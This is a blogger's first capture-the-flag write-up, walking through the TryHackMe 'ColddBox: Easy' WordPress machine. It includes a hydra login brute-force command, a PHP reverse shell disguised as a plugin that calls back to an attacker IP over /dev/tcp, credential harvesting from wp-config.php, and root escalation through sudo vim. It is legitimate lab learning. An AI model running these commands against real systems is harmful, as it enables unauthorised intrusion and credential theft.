TryHackMe Write-up - ColddBox: Easy
It’s been a while since I last posted. I’ve been toiling away at TryHackMe, a site I signed up for in December to whet my cybersecurity appetite. I forked out quite a bit of money to access the Offensive Security modules at the beginning of the year, but I find that TryHackMe is a lot more ‘fun’ in the sense that it is highly community driven with walkthroughs for nearly all of the rooms that I have interacted with, unlike Offensive Security. Don’t get me wrong, I like what I have seen on the Offensive Security portal and will make my way back to it eventually, for now, I am simply running through the ‘gamified’ TryHackMe to level up, get some badges, and learn some stuff.
Of course, Offensive Security would say that they too are community driven, but they are also really big on not letting their educational material leave their site. TryHackme, on the otherhand, is much more lax, and much cheaper.
Anyway, with all that said, one of the reasons I set up a blog is to have a place for write-ups as I work on building my penetration testing knowledge. I have been doing a lot of machines, but have yet to jump into the domain of writing a write-up, that stops today with this inaugural write-up of TryHackMe’s ColddBox: Easy room. Let’s jump in.
Getting Started
As the name states, this is an easy difficulty room, and as is pretty typical in these rooms, one must find the user flag, and the root flag. As this is my first write-up, and because there have been several other write-ups written, I’ll heavily lean on the experiences of those who have written before for this.
After launching the machine, we get the following IP address: 10.10.192.58
First things first, let’s run an nmap scan:
nmap -sc -sV 10.10.192.58
Command Breakdown:
nmap- invokenmap-sC- equivalent to--script=default-sV- Probe open ports to determine service/version info<IP Address>- the IP address of the machine
nmap -sC -sV 10.10.192.58
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-04 19:30 GMT
Nmap scan report for ip-10-10-192-58.eu-west-1.compute.internal (10.10.192.58)
Host is up (0.0010s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
MAC Address: 02:5F:CF:55:9B:EB (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.85 seconds
This only runs against the top 1000 ports, and we can see that only port 80 is open. We also can see that this is a WordPress site running on an Apache server.
I checked out Exploit-DB to see if there are any exploits for the two versions listed in the scan, but didn’t find anything:
Alright, no worries, let’s use Gobuster to fuzz through all of the possible directories that might exist:
gobuster dir -u 10.10.192.58 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.192.58
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2023/03/04 19:34:43 Starting gobuster
===============================================================
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-admin (Status: 301)
/hidden (Status: 301)
/server-status (Status: 403)
===============================================================
2023/03/04 19:35:11 Finished
===============================================================
There isn’t much here, the /wp-admin path re-directs to /wp-login, that /hidden path looks interesting, let’s check that out:
This looks to be a note from a ‘Philip’ talking about two other users, ‘C0ldd’ and ‘Hugo’, but I am not sure if these are their real names or nicknames, not login usernames. It would be nice if we could get the usernames to log in with so we could brute-force some passwords.
Some of the write-ups I looked at used a tool called, wpscan. This sounds like a good tool to use given that this is a WordPress site after all and because this version of WordPress didn’t show any exploits. I’ve never used wpscan up until now, but now is as good a time as any.
Before I run it, I added the VM’s IP address to my /etc/hosts file like so (though it’s not mandatory):
10.10.192.58 ColddBoxEasy
After performing the scan, we’re returned with these results:
wpscan --url http://ColddBoxEasy -e vp,vt,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.7
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://colddboxeasy/ [10.10.192.58]
[+] Started: Sat Mar 4 19:54:25 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://colddboxeasy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://colddboxeasy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://colddboxeasy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://colddboxeasy/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://colddboxeasy/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[+] WordPress theme in use: twentyfifteen
| Location: http://colddboxeasy/wp-content/themes/twentyfifteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://colddboxeasy/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.3
| Style URL: http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:06 <> (494 / 494) 100.00% Time: 00:00:06
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:12 <==> (10 / 10) 100.00% Time: 00:00:12
[i] User(s) Identified:
[+] [REDACTED]
| Found By: Rss Generator (Passive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Sat Mar 4 19:55:08 2023
[+] Requests Done: 551
[+] Cached Requests: 10
[+] Data Sent: 128.562 KB
[+] Data Received: 332.173 KB
[+] Memory used: 303.82 MB
[+] Elapsed time: 00:00:43
Great! Four users managed to turn up, 3 of them seem to be related to that hidden URL, though I have redacted the names from the printout.
Now let’s try running hydra against these usernames to see if we can yield some passwords. I initially started off with a .txt file based list of the four users, but I found that it was taking quite a bit of time, so I parallelized the task for the four users and wound up with a password for one of them. Though I won’t paste the password here, I will share the command I ran:
hydra -l [REDACTED] -P /usr/share/wordlists/rockyou.txt ColddBoxEasy -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Admittedly, I got this command from another write-up as I am still getting acquainted with Hydra.
Logging into Wordpress
After logging into the Wordpress Admin portal, the first thing I want to do is check to see if the user has Administrator writes. I can do this by looking at the users page while logged in and see that the user that I am logged in as is in fact an Administrator:
Pop a shell
Now to get a reverse shell. From some of the other write-ups I saw, there are multiple ways to pop a shell, I am going to go with uploading a plug-in with a reverse shell, but before I do that, I need to start a listener on my attacking machine:
nc -lvnp 1234
Below is the reverse shell script that we’ll upload:
<?php
/**
* Plugin Name: Wordpress Maint Shell
* Author: Wordpress
**/
exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.108.11/1234 0>&1'\")
?>
The plug-ins page only allows for .zip uploads, so let’s zip up the file and upload it.
After waiting a while, an error is encountered, and the plug-in is not activated:
Alright, let’s try this a different way, in another write-up we can upload a PHP script as the 404 template to active a reverse shell. We’ll grab this world famous PHP script, copy it, and paste it into the 404 template. Then, having started a listener, we’ll navigate to a 404 page to activate the reverse shell. Obviously, it’s pretty easy to find a 404 page, just navigate to any URL that would return a 404. Having done that, we should be able navigate back to a listener to see our shell:
root@ip-10-10-108-11:~# nc -lvnp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.192.58 45108 received!
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
22:13:59 up 1:45, 0 users, load average: 44.77, 44.76, 44.59
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Let’s stabilize it with the following two commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Great! Let’s grab some flags now!
Getting flags
After running whoami we can see that I am logged in as the www-data user, let’s see if that’s enough to get the user.txt flag:
www-data@ColddBox-Easy:/home/[REDACTED]$ ls
ls
user.txt
www-data@ColddBox-Easy:/home/[REDACTED]$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
Nope, the www-data user is unable to read this user’s /home files…we’ll need to elevate our privileges somehow…or, why not try to switch to the user and try their password that they logged in to the WordPress portal as?
Actually, trying to switch to the user with the same password to log in to the WordPress Admin portal doesn’t work, in another write-up I saw that we could take a look at a MySQL database to glean more user information.
by navigating back to /var/www/html, we can see that there is a wp-config.php file, let’s cat that and see if we can get a password…
/** MySQL database username */
define('DB_USER', '[REDACTED]');
/** MySQL database password */
define('DB_PASSWORD', '[REDACTED]');
Aha! Ok, let’s try switching to the user again, but with this password instead. It worked!
www-data@ColddBox-Easy:/var/www/html$ su [REDACTED]
Password: [REDACTED]
[REDACTED]@ColddBox-Easy:/var/www/html$ whoami
[REDACTED]
Alright, let’s get the user.txt file then:
[REDACTED]@ColddBox-Easy:~$ cat user.txt
[REDACTED]
We got it! Great, let’s try running sudo -l to see if this user has any sudo privileges.
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
Awesome! They do! Let’s use GTFOBins to elevate our privileges using one of these programs. I’ll choose vim. We’ll go here to see what to run in vim to gain a root shell, I chose this:
sudo vim -c ':!/bin/sh'
And bam! Root shell acquired!
[REDACTED]@ColddBox-Easy:~$ sudo vim -c ':!/bin/bash'
sudo vim -c ':!/bin/bash'
root@ColddBox-Easy:~# whoami
2R11;rgb:4040/4545/5252whoami
2R11: no se encontró la orden
bash: rgb:4040/4545/5252whoami: No existe el archivo o el directorio
root@ColddBox-Easy:~#
Ok, let’s grab the root flag and we’ll be done. Let’s navigate to the root directory, and…
Boom, there we go! Nice job…
root@ColddBox-Easy:/root# cat root.txt
[REDACTED]
Conclusion
This was a great diversion from some of the learnings I have been doing. I know that in order to get good at this cybersecurity field, that a lot of practical exercise is required, theory just doesn’t do actual exercises justice.
I have used and learned about a lot of different tools as I workthrough the various modules and learning paths on TryHackMe, this was the first time I used wpscan. It’s possible that this tool isn’t required to get the user names, but it seems like it’s packaged with Kali natively, so it’s definitely a good tool to use when dealing with WordPress sites.
